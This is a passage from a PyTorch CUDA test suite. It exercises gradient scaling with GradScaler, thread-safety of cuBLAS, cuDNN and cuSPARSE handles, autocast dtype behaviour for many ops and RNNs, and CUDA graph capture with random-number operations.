def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
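# The grads of the scaled loss are themselves scaled, so they are divided by
# the current scale before building the penalty term; the penalty (and hence
# the final loss) then matches the unscaled control computation.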
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
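# Dividing the loss keeps the gradient accumulated over iters_to_accumulate
# backward() calls comparable to a single optimizer step on the combined batch.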
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be tuned carefully.
# Too small a number makes the race condition hard to trigger,
# while too large a number sometimes causes a hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
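# cartesian_prod(a, a) enumerates every (row, col) index pair, so the
# resulting COO tensor is a dense all-ones size x size matrix.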
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
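# Runs `op` under autocast via the torch.* and/or Tensor.* entry points, checks
# the output dtype, and compares against an explicit cast of the inputs to
# run_as_type with autocast disabled, which should be bitwise identical.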
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
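# Summary of the pattern exercised above (hedged restatement, not additional test logic):
# custom_fwd(cast_inputs=torch.float32) casts incoming floating-point CUDA tensors to fp32
# and runs forward with autocast locally disabled, and custom_bwd runs backward under the
# same autocast state that forward saw; outside an autocast-enabled region both decorators
# become no-ops, which is what the second mymm call with torch.float16 demonstrates.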
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Checks that autocast does not leak memory by repeatedly re-caching the same casted
# parameters when executed inside a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
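# Equivalent sketch (comments only, illustrative): the torch.cuda.graph context manager used
# later in this file wraps the same capture_begin()/capture_end() pair on a side stream:
#   g = torch.cuda.CUDAGraph()
#   a = torch.full((1000,), 1, device="cuda")
#   with torch.cuda.graph(g):
#       b = a + 1
#   g.replay()   # re-runs the captured kernels on the captured memory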
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
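# Background (hedged summary): capturable CUDA RNG kernels read their Philox offset from a
# small holder tensor owned by the graph, and each replay() advances the generator's offset
# by the amount the capture consumes, so interleaving replays with eager RNG calls keeps
# both paths walking the same random sequence, which is exactly what this test checks.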
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
